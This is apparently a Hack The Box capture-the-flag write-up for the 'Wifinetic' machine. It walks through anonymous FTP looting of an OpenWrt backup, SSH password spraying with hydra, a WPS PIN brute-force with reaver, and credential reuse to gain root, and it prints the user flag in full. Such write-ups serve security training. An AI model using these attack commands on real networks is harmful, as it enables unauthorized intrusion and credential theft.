HTB - Wifinetic

Wifinetic is an easy difficulty Linux machine which presents an intriguing network challenge, focusing on wireless security and network monitoring.

Scope

IP Address: 10.10.11.247

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ nmap -F $ip -Pn

PORT    STATE    SERVICE
21/tcp  open     ftp
22/tcp  open     ssh
25/tcp  filtered smtp
53/tcp  open     domain
143/tcp filtered imap

* Open ports: 21 - 22 - 53
* UDP Open ports: 
* Services:
* Versions:
* Important Notes:

FTP

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip

<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ tree -a 10.10.11.247 
10.10.11.247
├── .listing
├── MigrateOpenWrt.txt
├── ProjectGreatMigration.pdf
├── ProjectOpenWRT.pdf
├── backup-OpenWrt-2023-07-26.tar
└── employees_wellness.pdf

Talk a look at backup-OpenWrt-2023-07-26.tar . I could see that it's a backup for configuration files located at /etc

┌──(kali㉿kali)-[~/…/HTB/machines/Wifinetic/10.10.11.247]
└─$ tar -xvf backup-OpenWrt-2023-07-26.tar 
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder

┌──(kali㉿kali)-[~/…/Wifinetic/10.10.11.247/etc/config]
└─$ cat wireless          

<snip>

config wifi-iface 'wifinet0'
        option device 'radio0'
        option mode 'ap'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
        option wps_pushbutton '1'

config wifi-iface 'wifinet1'
        option device 'radio1'
        option mode 'sta'
        option network 'wwan'
        option ssid 'OpenWrt'
        option encryption 'psk'
     option key 'VeRyUniUqWiFIPasswrd1!'

So, from the file above, We can information about two Access Points and their passwords

wifinet0: OpenWrt:VeRyUniUqWiFIPasswrd1!
wifinet1: OpenWrt:VeRyUniUqWiFIPasswrd1!

Initial Access

---

┌──(kali㉿kali)-[~/…/machines/Wifinetic/10.10.11.247/etc]
└─$ cat passwd | cut -d: -f1 | tee -a users.list
root
daemon
ftp
network
nobody
ntp
dnsmasq
logd
ubus
netadmin

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ hydra -L users.list -p 'VeRyUniUqWiFIPasswrd1!' ssh://$ip  

<snip>
[22][ssh] host: 10.10.11.247   login: netadmin   password: VeRyUniUqWiFIPasswrd1!

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ ssh netadmin@$ip 
<snip>
  System load:            0.07
  Usage of /:             64.5% of 4.76GB
  Memory usage:           6%
  Swap usage:             0%
  Processes:              226
  Users logged in:        0
  IPv4 address for eth0:  10.10.11.247
  IPv6 address for eth0:  dead:beef::250:56ff:fe94:12df
  IPv4 address for wlan0: 192.168.1.1
  IPv4 address for wlan1: 192.168.1.23
  
netadmin@wifinetic:~$

netadmin@wifinetic:~$ cat user.txt 
15b1159827f23a58a86df2f4ee876256

User flag: 15b1159827f23a58a8xxxxxxxxxxxxxx

---

Privilege Escalation

netadmin@wifinetic:~$ wget 10.10.16.25/linpeas.sh && chmod +x linpeas.sh
netadmin@wifinetic:~$ ./linpeas.sh | tee -a lin.ouput

<snip>
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
<snip>

All the above capabilities are standard ones except reaver, So I will search for this tool and see what exactly it does

WIFI Protected Setup (WPS) is a standard designed to make joining a Wi-Fi router easier, especially in home settings. The device would have an 8 digit pin printed on the device, and the user could enter that pin to join the network. reaver is a tool to brute force WPS PIN associated with any AP

netadmin@wifinetic:~$ reaver -h

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv or -vvv for more)
        -q, --quiet                     Only display critical messages
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
        -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [10]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.40]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -J, --timeout-is-nack           Treat timeout as NACK (DIR-300/320)
        -F, --ignore-fcs                Ignore frame checksum errors
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -K, --pixie-dust                Run pixiedust attack
        -Z                              Run pixiedust attack

Example:
        reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv

I run ifconfig to see available interfaces

netadmin@wifinetic:~$ ifconfig
<snip>

mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 37744  bytes 6689251 (6.6 MB)
        RX errors 0  dropped 37744  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.1  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:0  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:00:00  txqueuelen 1000  (Ethernet)
        RX packets 720  bytes 77584 (77.5 KB)
        RX errors 0  dropped 179  overruns 0  frame 0
        TX packets 937  bytes 120581 (120.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.23  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:100  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:01:00  txqueuelen 1000  (Ethernet)
        RX packets 388  bytes 53737 (53.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 720  bytes 90544 (90.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan2: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

For the first moment, I could say that mon0 interface for monitoring mode and other wlanX are the interfaces for Access points on the machine.

The next step is to get more info about these APs

netadmin@wifinetic:~$ iwconfig
<sinp>

wlan0     IEEE 802.11  Mode:Master  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
mon0      IEEE 802.11  Mode:Monitor  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
wlan2     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
wlan1     IEEE 802.11  ESSID:"OpenWrt"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: 02:00:00:00:00:00   
          Bit Rate:2 Mb/s   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          Link Quality=70/70  Signal level=-30 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:2   Missed beacon:0

We can conclude that mon0 is the interface that we will use for attacking the access points and wlan1 is the target access point as it's the only one that have ESSID: "OpenWrt" with SSID:02:00:00:00:00:00

I can now start reaver to brute force WPS PIN

netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtxxxxxxxxxxx'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.

As there is no path for me now to root, I will try to authenticate to root with the WPA PSK key obtained above:

netadmin@wifinetic:~$ su root
Password: 
root@wifinetic:/home/netadmin#

Success :)

root@wifinetic:~# cat root.txt
1114dd5c6d353295d878xxxxxxxxxxxxxx

Root flag: 1114dd5c6d353295d8xxxxxxxxxxxxx